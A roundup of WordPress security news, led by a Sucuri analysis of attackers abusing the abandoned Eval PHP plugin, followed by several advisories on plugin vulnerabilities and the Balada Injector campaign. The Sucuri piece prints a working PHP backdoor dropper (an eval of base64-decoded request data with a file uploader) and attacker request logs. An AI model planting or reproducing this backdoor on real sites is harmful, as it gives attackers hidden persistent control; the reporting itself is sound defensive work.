Massive Abuse of Abandoned Eval PHP WordPress Plugin

Attackers are always finding new and creative ways to compromise websites and maintain their foothold in environments. This is frequently done via the use of backdoors: PHP scripts designed to allow attackers access and control even after you’ve changed your passwords and thought that the worst was over.

Since external scans are unable to see website backdoors they can often be identified through the usage of server-side scans and file-integrity monitoring, which we offer as part of our services. This is also offered through a number of available WordPress security plugins that can be used on your website.

However, we recently started observing attackers making use of an unorthodox type of backdoor and reinfection method which would go completely undetected if website monitoring doesn’t happen to include the database.

Conventional backdoors

Almost all of the time website backdoors are coded in the PHP programming language: the backbone of the modern web. WordPress itself (making up over 40%+ of the web) is largely PHP based, as well as most other major CMS platforms like Joomla, Magento and others. PHP is an incredibly versatile language, which also means that it can be misused by attackers. One of the most common (mis)usages by attackers are backdoors.

According to our recent 2022 Website Threat Report, we can see that remote code execution backdoors, webshells, and uploaders are the most popular among attackers to deploy to infected environments:

Backdoor category distribution as seen in the 2022 website threat report

However, with good file integrity monitoring and server side scanning, backdoors can be effectively monitored for, detected, and removed to keep your websites safe from further attacks.

Database injections

Over the last few weeks we noticed that some infected website’s databases were being injected with the following code into the wp_posts table:




[evalphp]file_put_contents($_SERVER[‘DOCUMENT_ROOT’].’/7299b0773c8d.php’,’<?=409723*20;if(md5($_COOKIE[d])==“17028f487cb2a84607646da3ad3878ec”){echo“ok”;eval(base64_decode($_REQUEST[id]));if($_POST[“up”]==“up”){@copy($_FILES[“file”][“tmp_name”],$_FILES[“file”][“name”]);}}?>‘);[/evalphp]

This code is quite simple: It uses the file_put_contents function to create a PHP script into the docroot of the website with the specified remote code execution backdoor. All the attacker needs to do is to visit one of the infected posts or pages and the backdoor will be injected into the file structure.

It’s not exactly a new backdoor, however; more conventional PHP backdoors of this variety were found as early as last summer and over 6,000 instances of this backdoor were cleaned from compromised sites in the last 6 months alone. However, the backdoor being injected into the database is certainly a new and interesting development.

Misuse of legitimate plugin

In the code sample above you may notice the [evalphp] WordPress shortcodes (small code tags used in WordPress environments that make it easy to add complex functionality to your website). These are related to a very old WordPress plugin available in the official repository with the same name Eval PHP:

Eval PHP WordPress plugin which leads to website infection

This plugin allows PHP code to be inserted into pages and posts of WordPress sites and then executed every time the posts are opened in a browser. What could go wrong, right?

It hasn’t been updated in over a decade and has very few real active installations. However, we can see that since the beginning of April it has surged in popularity:

Downloads per day for EvalPHP

For the ten years leading up to the end of March, 2023, this plugin rarely had 1 download a day. But around March 29, 2023 we saw daily downloads spike to 7,000. After that, every single day we have seen 3k-5k downloads — with over 100,000 downloads total.

EvalPHP WordPress plugin downloads history for April 18, 2023
EvalPHP plugin downloads history for April 18, 2023

This WordPress data correlates to our own logs, where we see that starting March 29, 2023, some attackers started installing the EvalPHP plugin on compromised sites and using it to create the earlier mentioned backdoors.

Malicious requests

In all cases the requests originate from these three IP addresses:

  1. 91.193.43.151 – AEZA-AS, RU
  2. 79.137.206.177 – AEZA-AS, RU
  3. 212.113.119.6 – AEZA-AS, RU
79.137.206.177 - - [08/Apr/2023:07:28:21 -0700] "PUT /wp-json/wp/v2/plugins/evalphp/evalphp/?status=active HTTP/1.1" 200 635 "http://<redacted>.com/wp-json/wp/v2/plugins" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2902.99 Safari/537.36" 613

79.137.206.177 - - [08/Apr/2023:07:28:30 -0700] "POST /wp-json/wp/v2/pages HTTP/1.1" 201 2029 "http://<redacted>.com/wp-json/wp/v2/plugins/evalphp/evalphp/?status=active" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2902.99 Safari/537.36" 504

79.137.206.177 - - [08/Apr/2023:07:28:31 -0700] "GET /3e9c0ca6bbe9.php HTTP/1.1" 200 27 "http://<redacted>.com/wp-json/wp/v2/pages" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2902.99 Safari/537.36" 17

Here you can see a sequence of requests that:

  1. Checks to make sure that the Eval PHP plugin is active.
  2. Creates a page with malware inside the [evalphp] shortcodes. It is enough to execute the PHP code and drop the 3e9c0ca6bbe9.php backdoor (the filename is unique for each environment) in the site root.
  3. Accesses the newly dropped backdoor.

Since the backdoor uses the $_REQUEST[id] to obtain the executable PHP code, it doesn’t require a POST request to conceal its parameters in access logs — it can pass them as cookies, since $_REQUEST contains the contents of $_GET$_POST and $_COOKIE.

GET requests without visible parameters look less suspicious than POST requests. But in the case of this backdoor, GET can be equally dangerous.

Pages with evalphp malware

In our experience, hackers sometimes create a test page (new pages are not displayed by default on the home page) slug publish, (the URL on a typical WordPress site will be <site-domain>.com/publish/) and the word “Test” as its only contents.

JSON from test page created by backdoor

However, the real backdoors are created in multiple posts that are saved as drafts and not publicly visible at all. The way the Eval PHP plugin works it’s enough to save a page as a draft in order to execute the PHP code inside the [evalphp] shortcodes.

This is how these page drafts look in the SQL dump of the wp_posts table:

SQL dump WP Posts from PHP Eval wordpress plugin

In all cases, attackers were able to successfully log into WordPress admin. And the malicious pages are created with a real site administrator as their author. However, on some of the compromised sites we found created malicious admin users with random names and outlook.com emails — for example: 5faf461e / 5faf461e@outlook[.]comdf8a6aa9 / df8a6aa9@outlook[.]com, etc.

The compromised sites sometimes have the same backdoor installed in other files. Most often we find it in /wp-content/plugins/background-image-cropper/accesson.php — in logs we find how hackers upload a custom version of the legitimate background-image-cropper plugin. We also find it in the theme’s functions.php file when attackers modify this file using the WordPress theme editor.

Why are attackers putting backdoors into wp_posts?

You might be wondering why the attackers would choose this new tactic of injecting backdoors into compromised website environments rather than just sticking with good old fashioned PHP backdoors.

Although the injection in question does drop a conventional backdoor into the file structure, the combination of a legitimate plugin and a backdoor dropper in a WordPress post allows them to easily reinfect the website and stay hidden — all they need to do is to visit a “benign” web page.

Fortunately, some WordPress security plugins such as our Sucuri Scanner do log administrator activity within a website, such as plugin installations and changes to pages/posts which would be a symptom of this attack. If you notice the Eval PHP plugin installed on your website and it wasn’t you who did it then there’s a good chance that your website has been compromised.

Potentially dangerous plugins in WordPress repository

At this point, WordPress has a warning when you open the EvalPHP page in the official plugin repository:

This plugin hasn’t been tested with the latest 3 major releases of WordPress. It may no longer be maintained or supported and may have compatibility issues when used with more recent versions of WordPress.

However, this may not be enough for plugins that can be easily abused. Maybe such plugins should be completely delisted, especially when they are not updated for 10+ years and have a really small legitimate user base.

EvalPHP is not the only plugin like this. You can find other similar plugins in the official WordPress plugin repository. For example:

Example of deprecated PHPEval wordpress plugin

This PHPEval plugin that hasn’t been updated for 11+ years and has 40+ active users. Is there a reason to keep it in the repository after so many years of inactivity? And by the way, we can see an increased interest in this plugin during the last week…

Keeping such plugins in the official repository makes it easier for hackers to stay under radar since they can install a legitimate unmodified plugin from a reputable source instead of installing fake plugins or modifying existing plugins, which can be detected by scanners that monitor integrity of known plugins.

Mitigation steps to protect your environment

In checking logs from environments affected by these backdoors, so far all of them seemed like the attackers already had established administrator access to the websites which allowed them to install the evalphp plugin within the environments.

This is a testament to how crucially important it is to secure the wp-admin panel of your WordPress environment as well as monitor any administrator activity taking place. In addition to regular file cleanup and changing passwords, don’t forget to review your WordPress users and pages — some of them may have been created by hackers.

Other steps to mitigate risk from infection include:

Source: https://blog.sucuri.net/2023/04/massive-abuse-of-abandoned-evalphp-wordpress-plugin.html

Critical Security Update: Directorist WordPress Plugin Patches Two High-risk Vulnerabilities

On April 3, 2023, the WordFence team uncovered two significant vulnerabilities – an Arbitrary User Password Reset to Privilege Escalation, and an Insecure Direct Object Reference leading to Arbitrary Post Deletion. Both vulnerabilities were found to affect Directorist versions 7.5.4 and earlier.

Sites using the free version of Wordfence received a firewall rule to protect against any exploits targeting these vulnerabilities on May 4, 2023.

Unfortunately, on June 1, 2023, the plugin was closed due to developer unresponsiveness, and it currently remains unavailable for download from the repository. This presents an issue as site owners are unable to request an update directly via their WordPress dashboard. Given this situation, we advise site owners to either temporarily uninstall the plugin, or manually download the patched version, 7.5.5, directly from the developer’s site and upload it to their sites for optimal protection. For this reason, we have intentionally kept specific vulnerability details to a minimum in this post.

Source and more details: https://www.wordfence.com/blog/2023/06/critical-security-update-directorist-wordpress-plugin-patches-two-high-risk-vulnerabilities/

Credential-Stealing Server Side Request Forgery Patched in Getwid

On April 6, 2023, the Wordfence Threat Intelligence team initiated the responsible disclosure process for two vulnerabilities in Getwid – Gutenberg Blocks, a plugin installed on over 50,000 WordPress sites. The plugin’s developers responded immediately, and we sent over the full disclosure the same day. A patched version of the plugin, 1.8.4, was released on April 13, 2023.

The most serious vulnerability had a high severity because it allows authenticated users to perform Server Side Request Forgery (SSRF), which can result in full access to the hosted instance on some cloud configurations. Additionally, it may allow further penetration into internal networks in some enterprise configurations. The other vulnerability is much lower in severity and allows authenticated users to clear and update the site’s template cache.

All Wordfence customers received a firewall rule protecting against the Server Side Request Forgery (SSRF) by May 6, 2023.

Source and more details: https://www.wordfence.com/blog/2023/06/credential-stealing-server-side-request-forgery-patched-in-getwid/

Arbitrary Plugin Installation Vulnerability In Formidable Forms

During a recent internal review of the Formidable Forms plugin, a serious security issue was detected which could potentially enable users with low privileges such as subscribers to install arbitrary plugins on vulnerable sites.

The exploitation of this vulnerability could grant malicious users the power to install any plugin available on downloads.wordpress.org, which can lead to a wide variety of attacks, including the upload of malicious content, creation of administrative users, or even a full site takeover.

WPScan reported the vulnerability to the authors of the plugin, who have responded by releasing Formidable Forms version 6.3.1 to mitigate this threat. We strongly advise that you update the affected plugin to this latest version and ensure you have robust security measures in place.

Source and more details: https://blog.wpscan.com/arbitrary-plugin-installation-vulnerability-in-formidable-forms/

WPDeveloper Addresses Privilege Escalation Vulnerability in ReviewX WordPress Plugin

On May 20, 2023, the Wordfence Threat Intelligence team identified and began the responsible disclosure process for a Privilege Escalation vulnerability in WPDeveloper’s ReviewX plugin, which is actively installed on more than 10,000 WordPress websites. This vulnerability makes it possible for an authenticated attacker to grant themselves administrative privileges via a user meta update.

Wordfence Premium users received a firewall rule to protect against any exploits targeting this vulnerability on May 22, 2023. Sites still using the free version of Wordfence will receive the same protection on June 21, 2023.

WordFence contacted WPDeveloper on May 20, 2023, and received a response the next day. After providing full disclosure details, the developer released a patch on May 22, 2023. We would like to commend the WPDeveloper development team for their prompt response and timely patch, which was released in just one day.

We urge users to update their sites with the latest patched version of ReviewX, which is version 1.6.14 at the time of this writing, as soon as possible.

Source and more details: https://www.wordfence.com/blog/2023/05/wpdeveloper-addresses-privilege-escalation-vulnerability-in-reviewx-wordpress-plugin/

Massive Balada Injector campaign attacking WordPress sites since 2017

An estimated one million WordPress websites have been compromised during a long-lasting campaign that exploits “all known and recently discovered theme and plugin vulnerabilities” to inject a Linux backdoor that researchers named Balad Injector.

The campaign has been running since 2017 and aims mostly to redirect to fake tech support pages, fraudulent lottery wins, and push notification scams.

According to website security company Sucuri, the Balad Injector campaign is the same one that Dr. Web reported in December 2022 to leverage known flaws in several plugins and themes to plant a backdoor.

Long-running campaign

Sucuri reports that Balada Injector attacks in waves occurring once a month or so, each using a freshly registered domain name to evade blocking lists.

Usually, the malware exploits newly disclosed vulnerabilities and develops custom attack routines around the flaw it targets.

Targeted add-ons from a specific infection wave
Targeted add-ons from a specific infection wave (Sucuri)

Injection methods observed by Sucuri all this time include siteurl hacks, HTML injections, database injections, and arbitrary file injections.

This plethora of attack vectors has also created duplicate site infections, with subsequent waves targeting already compromised sites. Sucuri highlights a case of a site that was attacked 311 times with 11 distinct versions of Balada.

This plethora of attack vectors has also created duplicate site infections, with subsequent waves targeting already compromised sites. Sucuri highlights a case of a site that was attacked 311 times with 11 distinct versions of Balada.

Typical Balada injection
Typical Balada injection (Sucuri)

Post-infection activity

Balada’s scripts focus on exfiltrating sensitive information like database credentials from wp-config.php files, so even if the site owner clears an infection and patches their add-ons, the threat actor maintains their access.

The campaign also seeks backup archives and databases, access logs, debug info, and files that might contain sensitive information. Sucuri says the threat actor frequently refreshes the list of targeted files.

Moreover, the malware looks for the presence of database administration tools like Adminer and phpMyAdmin. If these tools are vulnerable or misconfigured, they could be used to create new admin users, extract information from the site, or to inject persistent malware onto the database.

If these straight breach pathways are unavailable, the attackers turn to brute-forcing the admin password by trying out a set of 74 credentials.

Balada backdoors

The Balada Injector plants multiple backdoors on compromised WordPress sites for redundancy, which act as hidden access points for the attackers.

Sucuri reports that at some point in 2020, Balada was dropping backdoors to 176 predefined paths, making the complete removal of the backdoor very challenging.

Excerpt of backdoor paths list
Excerpt of backdoor paths list (Sucuri)

Also, the names of the planted backdoors changed in each campaign wave to make detections and removals harder for website owners.

The researchers say that Balada injectors are not present on every compromised site since a number that large of clients would be a tough challenge to manage. They believe that the hackers uploaded the malware on websites “hosted on a private or virtual private servers that shows signs of not being properly managed or neglected.”

From there, the injectors scan for websites that share the same server account and file permissions and search them for writable directories, starting from higher-privileged directories, to perform cross-site infections.

This approach allows the threat actors to easily compromise several sites at one go and quickly spread their backdoors while having to manage a minimal number of injectors.

Moreover, cross-site infections enable the attackers to re-infect cleaned-up sites repeatedly, as long as access to the VPS is maintained.

Sucuri notes that defending against Balada Injector attacks may differ from one case to another and that there is no one specific set of instructions admins can follow to keep the threat at bay, due to the wide variety of infection vectors.

However, Sucuri’s general WordPress malware cleanup guides should be enough to block most of the attempts.

Keeping all the website software updated, using strong, unique passwords, implementing two-factor authentication, and adding file integrity systems should work well enough to protect sites from compromise.

Source: https://www.bleepingcomputer.com/news/security/massive-balada-injector-campaign-attacking-wordpress-sites-since-2017/

Wordfence Firewall Blocks Bizarre Large-Scale XSS Campaign

The Wordfence Threat Intelligence team has been monitoring an increase in attacks targeting a Cross-Site Scripting vulnerability in Beautiful Cookie Consent Banner, a WordPress plugin installed on over 40,000 sites. The vulnerability, which was fully patched in January in version 2.10.2, offers unauthenticated attackers the ability to add malicious JavaScript to a website, potentially allowing redirects to malvertizing sites as well as the creation of malicious admin users, both of which are appealing use cases for attackers.

All Wordfence sites are protected against this vulnerability by the Wordfence Firewall’s Built-in Cross-Site Scripting protection. Note that since this vulnerability did not require a separate firewall rule, statistics for it are not currently publicly available on Wordfence Intelligence as they are aggregated under the general Cross-Site Scripting chart, where it currently accounts roughly over two-thirds of all attacks blocked by the rule.

According to WordFence records, the vulnerability has been actively attacked since February 5, 2023, but this is the largest attack against it that they have seen. WordFence has blocked nearly 3 million attacks against more than 1.5 million sites, from nearly 14,000 IP addresses since May 23, 2023, and attacks are ongoing.

It is believed that this is the work of a single actor, as every single attack contained a partial payload of onmouseenter=" and no further functioning JavaScript. It is likely that this set of attacks is being performed using a misconfigured exploit that expects a customized payload, and that the attacker has simply failed to provide one.

Despite this fact, if your website is running a vulnerable version of the plugin and you are not currently using Wordfence or another Web Application Firewall, these attacks do have the potential to corrupt the configuration of the plugin which can break its intended functionality, so we still recommend updating to the latest version, which is 2.13.0 at the time of this writing, as soon as possible.

Source and more details: https://www.wordfence.com/blog/2023/05/wordfence-firewall-blocks-bizarre-large-scale-xss-campaign

WordPress 6.2.2 Security Release

The 6.2.2 minor release addresses 1 bug and 1 security issue. Because this is a security release, it is recommended that you update your sites immediately. All versions since WordPress 5.9 have also been updated.

WordPress 6.2.2 is a rapid response release to address a regression in 6.2.1 and further patch a vulnerability addressed in 6.2.1. The next major release will be version 6.3 planned for August 2023.

The update process will begin automatically if you have sites that support automatic background updates.

You can download WordPress 6.2.2 from WordPress.org or visit your WordPress Dashboard, click “Updates,” and click “Update Now.”

Full info: https://wordpress.org/news/2023/05/wordpress-6-2-2-security-release/

W3 Eden Addresses Authenticated Stored XSS Vulnerability in Download Manager WordPress Plugin

The Wordfence Threat Intelligence team identified a stored Cross-Site Scripting (XSS) vulnerability in W3 Eden’s Download Manager plugin, which is actively installed on more than 100,000 WordPress websites, making it one of the most popular download management plugins. The vulnerability enables threat actors with contributor-level permissions or higher to inject malicious web scripts into pages using the plugin’s shortcode.

All WordFence customers are protected against any exploits targeting this vulnerability by the Wordfence firewall’s built-in Cross-Site Scripting protection.

The developer released a patch on May 1, 2023. We would like to commend the W3 Eden development team for their prompt response and timely patch.

We urge users to update their sites with the latest patched version of Download Manager, version 3.2.71 at the time of this writing, as soon as possible.

Source and more details: https://www.wordfence.com/blog/2023/05/w3-eden-addresses-authenticated-stored-xss-vulnerability-in-download-manager-wordpress-plugin

Vulnerability in WordPress Google Analytics Plugin Hits +3 Million Websites

MonsterInsights Google Analytics WordPress plugin XSS vulnerability affects up to +3 million websites.

The National Vulnerability Database announced that a popular Google Analytics WordPress plugin installed in over 3 million was discovered to contain a Stored Cross-Site Scripting (XSS) vulnerability.

Stored XSS

A Cross-Site Scripting (XSS) attack generally occurs when a part of the website that accepts user input is insecure and allows unanticipated input, like scripts or links.

The XSS vulnerability can be leveraged to obtain unauthorized access to a website and can lead to user data theft or a full site takeover.

The non-profit Open Worldwide Application Security Project (OWASP) describes how the XSS vulnerability works:

“An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script.

Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site.”

A stored XSS, which is arguably worse, is one in which the malicious script is stored on the website servers itself.

The plugin, MonsterInsights – Google Analytics Dashboard for WordPress, was discovered to have the stored XSS version of the vulnerability.

MonsterInsights – Google Analytics Dashboard for WordPress Vulnerability

The MonsterInsights Google Analytics plugin is installed in over three million websites, which makes this vulnerability more concerning.

WordPress Security company, Patchstack, which discovered the vulnerability, published details:

“Rafie Muhammad (Patchstack) discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Google Analytics by MonsterInsights Plugin.

This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site.

This vulnerability has been fixed in version 8.14.1.”

The plugin, MonsterInsights – Google Analytics Dashboard for WordPress, was discovered to have the stored XSS version of the vulnerability.
MonsterInsights – Google Analytics Dashboard for WordPress Vulnerability
The MonsterInsights Google Analytics plugin is installed in over three million websites, which makes this vulnerability more concerning.
WordPress Security company, Patchstack, which discovered the vulnerability, published details:
“Rafie Muhammad (Patchstack) discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Google Analytics by MonsterInsights Plugin.
This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site.
This vulnerability has been fixed in version 8.14.1.”

Recommended Action

Patchstack recommends that all users of the MonsterInsights Analytics Plugin update their WordPress plugin immediately to the latest version or at least version 8.14.1.

Read the U.S. National Vulnerability Database announcement:

CVE-2023-23999 Detail

Read Patchstack’s announcement:

WordPress Google Analytics by MonsterInsights Plugin <= 8.14.0 is vulnerable to Cross Site Scripting (XSS)

As published in https://www.searchenginejournal.com/monsterinsights-wordpress-plugin-vulnerability/487510/